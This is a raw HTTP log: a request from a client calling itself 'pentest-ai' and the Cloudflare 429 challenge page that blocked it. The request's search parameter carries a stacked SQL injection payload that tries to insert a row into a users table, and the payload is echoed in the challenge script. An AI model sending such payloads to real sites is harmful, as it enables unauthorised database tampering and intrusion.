REQUEST:
GET https://my.myfirst.tech/search?category=1%27%3B%20INSERT%20INTO%20users%20VALUES%28%27x%27%2C%27y%27%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9471
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8476e9980a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=70JjZOr8zTIt%2FWkZZAOT4auqOB2VToVtH3soy9O4DyYUSeE7IbBGN8MqWaTJk8TRy5wavj3fB%2F1wGJwQqovCD9SsRaajoWBtNwS7kBfcjC8na3O%2BwwjDBmA%2FOQXg7RWYG%2F5l%2BiXCuyee1yExew%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8476e9980a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '66Jv8Lt7CQXrEb6mfcy9U0djgZ5QaTMN1YcNPQICHcw-1784281162-1.2.1.1-9sPcJMz5NFZSdlcUk8n7znOXr.G37fCwUVOPqvvwKTiX4W0iDiImHJaFCI5codFz',cITimeS: '1784281162',cRay: 'a1c8476e9980a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?category=1%27%3B+INSERT+INTO+users+VALUES%28%27x%27%2C%27y%27%29--\u0026__cf_chl_tk=MJYfZzB.i2M1LF7jajE4ZhPqWEr5z0v.txmXtcPItJk-1784281162-1.0.1.1-7P_J1kz8R0HIS4Ve.txW.xQsYtVg7QybZnM6ZYeY8PY",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?category=1%27%3B+INSERT+INTO+users+VALUES%28%27x%27%2C%27y%27%29--\u0026__cf_chl_f_tk=MJYfZzB.i2M1LF7jajE4ZhPqWEr5z0v.txmXtcPItJk-1784281162-1.0.1.1-7P_J1kz8R0HIS4Ve.txW.xQsYtVg7QybZnM6ZYeY8PY",md: 'ksiS8T7oyb_n8A0Y1FbtQ_A8SNplm5U8f0rYW63VDkI-1784281162-1.2.1.1-7l_GOc8M5lpXJQcXYjmOxRXcZrBXaXhOpGaYM5U3nn0XW0J0wB_dxG19SAG2sTGv0LjtfLPZs_kjbE.OwU_raM.lURVV3Sn90FQN9JIa_pW96DAkMSBCcmECht2_zFAQZxyF.vrjD5BAmeP5UWv3oXUsZlg6nZvXOC6BDIe_HRMUS7ESWu1FsIUooIsP_Y4Wndg2QBeLQEgHvXwX5._kzcaVM.MLZUJr854DA1WYaILOYxTknIpB4tdf6GQsgvR_8s6ozT_PUZZjey_07x7RG8C10uSd3J1piM9Tufr8sZsuNk0p1p0cor8MoCRCSmt69xQ_o40BPRIwYo58lloagmVKtPfpdDa.ynYo4IF1Dn6SZKS6PHZhPAqadGcbB5B59kqG8iIP1C3gl06p8cgIAk_BZLd6w7lPPXHBjaE79NZ5q0w3f_92eZXv8TKzDU6cQh5QxA4En_rfp5Br0GHzsweE6gwMi2jNs4ArEMMR1mKoGPjxmgM.GWTL3fFWLXsaOszo.nv824m3VnYAIAQZ0sCk3fEVgR8hzVSYKhw_a0lkIw3NfVfLC47kFJDzCP2gQuQexGd7zSuQSV0wHrkSjZ2GdsY3PqJkMyShctONWmoFo.gzQDOi8wrlmKPPRKwP_ywJ.dz60qQjNpwAau8t9WPcBMisbYYEI2CQRllhNUIW5lRe5fLKkEV0YbZ4WXwacIDwmwFIUa9kpcTQA6OfqnF.wdk7JUhcfT056e.kKk5zb4zZxIGRQvk8DeG3stPcygQmWLBqGRpHC32s1lHK.YAUc.FKwWM44ddv3At5kl4owCZtXxa7i7ze4CNiME8OiM1wSv8FpF2SZQU.ixKbi7_Ht6vq_6qb3VFuzwYGciHU.k1F1wwmryDXeozrI.1V5eOvap4X1J5qHP6mWQmObJfGFUqzz6mrvR7UXZi5y.tRIaYf5RZMUSoOJtFJAs3FlChixlrjy8b4K1UM7n6b_XHQF3AhF6HHLYG9eDrNGIFE5Mfpr3MRfMWU6Ge45.qUt81vz.Nm_leHxP9WlFSNzUoueOgJ3wIcq79u.7if4XJjT30L0N6ENDdDDhFfkafBkd0qvQBDY00_8rRFv0W2.cX9KJYI.YsPRYnrkSjpZ3AbDM8BVm6_04Q4ydh9uG0BboWBBaTwkIZbS.4dXfAcGkCkj7dQqDGHenZ52MqngZFC56XqvyDZgEGMW1eZ8Rx9pneA6GDfhtqDEpqy_jn2zA',mdrd: 'omWhqZUt6CG3frh7LfJrCCMLe5PgAqQlWRUegC9TusI-1784281162-1.2.1.1-W6j_Sot0TXsY1XdLRlPDpE7gStC7KAXwseHgo9Nr3VzqrFbXSVAHh4lXTeKgPlhSG9QuiCCFUmPT.WVMWGSaaBTIuoz6e0EPsorB3xVCTiAnfhvukpprHVaZIiEPoEc6bZrVEl_HVRN.F_WLWjV7a3BO6T17g1m07Ttnq08q3ovZUGEFlEufmT2Aoe05eIYOUFeyFM9xhpYyoIenicDPCsve6kyQlUJ7Zt2Qaf8ypEILrGRVCAwXcOscLPrfxH5k',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8476e9980a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?category=1%27%3B+INSERT+INTO+users+VALUES%28%27x%27%2C%27y%27%29--\u0026__cf_chl_rt_tk=MJYfZzB.i2M1LF7jajE4ZhPqWEr5z0v.txmXtcPItJk-1784281162-1.0.1.1-7P_J1kz8R0HIS4Ve.txW.xQsYtVg7QybZnM6ZYeY8PY"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
